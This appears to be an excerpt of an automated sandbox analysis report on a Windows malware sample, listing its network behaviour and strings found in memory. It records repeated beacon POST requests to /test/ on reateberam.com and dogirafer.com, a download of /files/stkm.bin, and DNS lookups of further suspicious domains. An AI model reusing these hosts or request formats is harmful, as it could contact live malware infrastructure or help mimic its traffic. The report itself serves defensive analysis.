Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkawqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkagqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlawqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlagqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiYwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiYgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiYQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiYAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiZwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiZQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 8_2_0303900C InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

8_2_0303900C

Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com

Source: global traffic	DNS traffic detected: DNS query: huanvn.com
Source: global traffic	DNS traffic detected: DNS query: vutarf.com
Source: global traffic	DNS traffic detected: DNS query: reateberam.com
Source: global traffic	DNS traffic detected: DNS query: dogirafer.com

Source: unknown

HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hmdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 92Cache-Control: no-cache

Source: explorer.exe, 00000008.00000003.3856101577.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000008.00000002.4535485561.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2320112731.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: explorer.exe, 00000008.00000003.3856101577.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000008.00000003.3856101577.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?3880ff7
Source: explorer.exe, 00000008.00000003.3856101577.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000008.00000002.4549635767.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219518856.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536479202.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.i.lencr.org/0
Source: rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.o.lencr.o
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219518856.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536479202.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.o.lencr.org0#
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2513069428.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E11E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536552097.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.i.lencr.org/0
Source: rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.org0
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2513069428.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E11E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536552097.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.org0#
Source: explorer.exe, 00000008.00000000.2322979543.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2322953274.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.4547057338.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E193000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
